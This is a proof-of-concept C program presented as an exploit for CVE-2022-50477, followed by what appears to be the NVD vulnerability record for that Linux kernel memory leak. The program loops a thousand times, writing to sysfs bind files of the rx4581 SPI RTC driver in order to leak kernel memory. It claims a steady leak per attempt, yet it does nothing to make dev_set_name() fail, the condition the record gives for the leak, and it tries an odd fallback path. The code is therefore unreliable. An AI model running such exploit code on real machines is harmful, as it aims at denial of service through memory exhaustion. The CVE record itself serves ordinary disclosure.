CVE-2022-50477

/* CVE-2022-50477 PoC - Trigger memory leak via SPI device rebind */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> int main() { int fd; char buf[256]; const char *spi_driver_path = "/sys/bus/spi/drivers/rx4581/bind"; int i; /* Continuously trigger SPI device binding to cause memory leak * in devm_rtc_allocate_device() when dev_set_name() fails. * Each failed attempt leaks ~2048 bytes of kernel memory. */ for (i = 0; i < 1000; i++) { fd = open(spi_driver_path, O_WRONLY); if (fd < 0) { /* Try alternative paths for SPI RTC devices */ snprintf(buf, sizeof(buf), "/sys/bus/spi/drivers/rx4581/spi%d.0/bind", i); fd = open(buf, O_WRONLY); if (fd < 0) continue; } /* Write SPI device address to trigger probe -> memory leak */ write(fd, "spi0.0\n", 7); close(fd); } printf("Memory leak triggered. Check /proc/meminfo for memory usage.\n"); return 0; }

{"cve": {"id": "CVE-2022-50477", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:44.300", "lastModified": "2026-01-23T16:32:55.113", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nrtc: class: Fix potential memleak in devm_rtc_allocate_device()\n\ndevm_rtc_allocate_device() will alloc a rtc_device first, and then run\ndev_set_name(). If dev_set_name() failed, the rtc_device will memleak.\nMove devm_add_action_or_reset() in front of dev_set_name() to prevent\nmemleak.\n\nunreferenced object 0xffff888110a53000 (size 2048):\n comm \"python3\", pid 470, jiffies 4296078308 (age 58.882s)\n hex dump (first 32 bytes):\n 00 00 00 00 00 00 00 00 08 30 a5 10 81 88 ff ff .........0......\n 08 30 a5 10 81 88 ff ff 00 00 00 00 00 00 00 00 .0..............\n backtrace:\n [<000000004aac0364>] kmalloc_trace+0x21/0x110\n [<000000000ff02202>] devm_rtc_allocate_device+0xd4/0x400\n [<000000001bdf5639>] devm_rtc_device_register+0x1a/0x80\n [<00000000351bf81c>] rx4581_probe+0xdd/0x110 [rtc_rx4581]\n [<00000000f0eba0ae>] spi_probe+0xde/0x130\n [<00000000bff89ee8>] really_probe+0x175/0x3f0\n [<00000000128e8d84>] __driver_probe_device+0xe6/0x170\n [<00000000ee5bf913>] device_driver_attach+0x32/0x80\n [<00000000f3f28f92>] bind_store+0x10b/0x1a0\n [<000000009ff812d8>] drv_attr_store+0x49/0x70\n [<000000008139c323>] sysfs_kf_write+0x8d/0xb0\n [<00000000b6146e01>] kernfs_fop_write_iter+0x214/0x2d0\n [<00000000ecbe3895>] vfs_write+0x61a/0x7d0\n [<00000000aa2196ea>] ksys_write+0xc8/0x190\n [<0000000046a600f5>] do_syscall_64+0x37/0x90\n [<00000000541a336f>] entry_SYSCALL_64_after_hwframe+0x63/0xcd"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.16", "matchCriteriaId": "C720A569-3D93-4D77-95F6-E2B3A3267D9F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.2", "matchCriteriaId": "77239F4B-6BB2-4B9E-A654-36A52396116C"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/0bcfc8fd3e596994f527b46730579428b3a4fa5f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/59457a0f079eae19aaf322b3cc1c8ba66f55c5f3", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/60da73808298ff2cfa9f165d55eb3d7aa7078601", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}